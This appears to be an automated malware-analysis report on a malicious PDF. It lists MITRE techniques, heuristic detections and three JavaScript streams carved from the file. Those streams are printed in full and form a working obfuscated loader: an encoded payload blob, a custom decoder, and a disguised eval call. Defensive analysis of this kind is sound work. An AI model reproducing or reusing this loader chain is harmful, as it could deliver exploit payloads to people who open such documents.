MALICIOUS
116
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The PDF sample contains embedded JavaScript, flagged by multiple heuristics as a potential exploit. The JavaScript code appears to be obfuscated, using `String.fromCharCode` and custom decoding functions to construct and execute a payload. The `hmglkuj8='e'+''+'v'+''+'a'+'l';hmglkuj8(emyrynh5);` line strongly suggests the use of `eval` to execute the decoded JavaScript, which is a common technique for downloading and running further malicious content.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
while(imbvflh.length){kmcvy.push((yrjsi(imbvflh.charCodeAt(0))<<(4+2))+yrjsi(imbvflh.charCodeAt(1))-(500+12));imbvflh=imbvflh.slice(2,imbvflh.length)}foatkqy=kzbnepk=imbvflh=0;emyrynh5='';function yrjsi(apbpxng){if(apbpxng>92)apbpxng--;return apbpxng-42}function iscuhtd(){if(imbvflh==0){kzbnepk=yrjsi(bpysg.charCodeAt(foatkqy++));imbvflh=6;}return ((kzbnepk>>--imbvflh)&0x01);}while(awxlkl--){i=0;while(kmcvy[i]<0){if(iscuhtd())i=-kmcvy[i];else i++;}emyrynh5+=String.fromCharCode(kmcvy[i]);} -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj263984_000.js |
pdf-javascript-stream | PDF /JS object 263984 at offset 0x197 | 2432 bytes |
SHA-256: c00d191bf3b27b32ad543d64884896dec301afad08f9ae66a1518c8f48ec6e12 |
|||
Preview scriptFirst 1,000 lines of the extracted script
imbvflh="0T1E1Z1f2Z1d3P1`1a242R1^3a1[2L2U1R1W3K1U2b1S3Z3_1P2]1L1M272f1J3^1H3S1F3f3h1=1B3`1@2_1>3N3Y0`1:3M183L163d1.11122Y2e1/2T2W0g0j1*3/330h3+3-0c0d3G3T0a3=3E0^2[0[3]0Y2h0W3b0U2V2g0:0K0P2O0N2d0L3V3X0I2J0G2^0A0D2S0B3I3Q0=0>3W3c0;2X3R06072`3O042a2c";bpysg=".Nf,dgY9:MehXMcX7E.H9/Qh>a^b-gF0?=hIQ_a_7E.H9/UeECfVYI_b?0Sj`7VhZj1+O??7L91L`-feP[1M[BeF0?;j8-4SV;cg@Sh=BM[cWI1ND9/bMeHf0JjTPaHPcR`ZeF0?=aO_HQSV;cg@8Q+Kj8--JZc6TK[1TY7Y5RM^[0`9TQ`iSY=^[0ZacG8-4RF;eP6Sh:AR6+J6+K_c6TK[1T2VVh=eJY?***+_c6TK[1T5.E=5N@Sh<=eHB:WR_HK6WJ:P0[_3K@G,<CP:J+YZJ**:P5*.3TbaK58+D.d=*K/*/R:Uf+,H_-2:04,.4-aR:L^P:LJhT.`R9K9D,>3C<JK/+e_3f;=2<^/+,B?Q:PD`V2**e.+Z+,7,bB:14a.**,._:8K/Xbc:*+_3JJ,.i@E,Hf<:PDZ_2**e.ZZ+,H1I,**+,,.*:LWON2**e.i:+,Hf<:PDZ_2**e.Vc*K*F5R=]67,@]=2:-GD.**,..`c:K<J,.jZe.VC^2=@OG,6fGK50+>3gJ,.haNK/BZ_2**D.ZZ+,<Z:R:1BD.**,._Q]K00h_2+V,.**,.Z67,<Z:R:1C_2**.2*F<.*83,D=d:M-He.+aE,**+,I5-:QX_N2?f-:J*+R=-*.2*F<.@*:R:6cN3S9O,67fR:1CV2**.22@0K6352:*+_3gJ,.haNK6`KR:*+_3KJ,.g8i.**,..2*K/E52:*+_3gJ,.haNK6`KR:*+_3CZ+,*cA:QNBD.WNP:J0fB:**2:=AK,/4*2=j-R<[Q6K7D?_2^Wa.VB/:Q]*2=bD<.?M-:J*+R=-*.35+,K*GKR:**2=<I4.BEb:J0Z2:**2=*Z_35+,K*GQ:J**:J+[2:*cN3S9O,67fR:1CV2**.3gV7,Hf<:K8BD.**7,BB*K*-L:LZ,/,+Q.K73gR;KYG,*f7K***K+,Z_3K3C,**8K35*.3JV@K63PZP7C4.CE9K***K***K***K***K***K***K***K***K8[;>3LLO:Q5GN3J/+,/4d_2SbI,4B*:Q8c>2SQ4K87_R=Q/0K,S/0K*+=R=V>?,B+<R=K/0K/8e_3]X?,GK;R:T[?R=,J,.fHO,/HU2=UGN2__*:JMI4..?gR;J@,.4ZPZKS,@K9N2T.Vc>R;U@+,*/P:J**:M@+D.*^PR:**2:LbG,IJ@K*6dT.**,.4-aR=f/I,8B^R;U*W,*C^>2**.2_We_2+Q,K***K*V;D.F`i:J*+R:M:+,+BL_2dUgK**-:P**:K/L7:Qc/R:-8DK***K6_M>2V`C_3Q.@K9Z5:J0F`,**+,6fd:L[A]K+6[_2=K@K,OC4.^:?,D_T_3Pf4.@G4_2/W,.6?i:J*+R<^J,.OZXK,5G_3R6G,+B-:MKIN2**D.i:+,.@C_3i+D.*^PR:**2=@P@K*+Z:J**:J**:J**:J**:J**:J**:J**:Q]*2;^Ad,**0K6c*K7j,R::Vi..2:R=7Z>2-L7:QJ^B;STaZJ04?,DWU>3P6W,4CKR;:O5:KW?V2SLO:J*SN3KV].>S=2:RUK:Q6fB=QF4.[A4K/GZR=PG4.>fVK,J*2=Xd>2>+@:KWd>2?jC,*1C,/0e_2?EQ:KWfc=Y4,.*,JK,OGg2>+<R:ZU.K8gZR=W4?,GBaZQ5F4.dKK:K:0a.4-YK8OB>3C?OR<:**hF8Q+O>82h;dO`7Vh9T5.E=5N@YSWQX]hj=G>BeF0?:cM`=E9=eL559>bG-=^5TECe1e,hWhZeF0?:cM`7L91L`9T<I=^,/W0M_323+,<,:-`ZeF0?=BM[cW=eK1`fG1[FDa2gH59eSWQX1=J]T1.HSLe=O^>iRD[O7b:ATJ**,d=F>;CCceF0?:ObT0ML9>[G3]h9T*f=/_Q5_jeBXNdF[aP5S8ARI1eX1cc6TTTgagXL99.E7jBXNdGYO9TE.H9/T1e5.E=5N@8Q+O>I^J]T1.HSFGUZSObeQ`39SdK,aM;e.+J6K*B-+ecG8-4SiY^eED0UMWH/6XjA_a^bCHjSj_S>V7F9]cfAK=5Y`-feO[aY,PAIMSj8-4RYIQ[eUdLg_[0Pj/`bWSh=H`dSL7A^/dSWBAE[H.9SPg^LA0QcgM=I@d1Kdj?H1UWX?[aY,PAIMjF8J";awxlkl=2695;kmcvy=new Array(); |
|||
javascript_obj263985_001.js |
pdf-javascript-stream | PDF /JS object 263985 at offset 0x871 | 492 bytes |
SHA-256: 01b70d8333944ff1dfcccc44190b137cf46ee69740b87747350fff0d4267e2e8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
while(imbvflh.length){kmcvy.push((yrjsi(imbvflh.charCodeAt(0))<<(4+2))+yrjsi(imbvflh.charCodeAt(1))-(500+12));imbvflh=imbvflh.slice(2,imbvflh.length)}foatkqy=kzbnepk=imbvflh=0;emyrynh5='';function yrjsi(apbpxng){if(apbpxng>92)apbpxng--;return apbpxng-42}function iscuhtd(){if(imbvflh==0){kzbnepk=yrjsi(bpysg.charCodeAt(foatkqy++));imbvflh=6;}return ((kzbnepk>>--imbvflh)&0x01);}while(awxlkl--){i=0;while(kmcvy[i]<0){if(iscuhtd())i=-kmcvy[i];else i++;}emyrynh5+=String.fromCharCode(kmcvy[i]);}
|
|||
javascript_obj263986_002.js |
pdf-javascript-stream | PDF /JS object 263986 at offset 0x9D1 | 50 bytes |
SHA-256: 597f4807e7ec0f7c502dd6db7be4a16bc92fa57e63cdb76e8c8dbd5c353a2fa4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
hmglkuj8='e'+''+'v'+''+'a'+'l';hmglkuj8(emyrynh5); |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.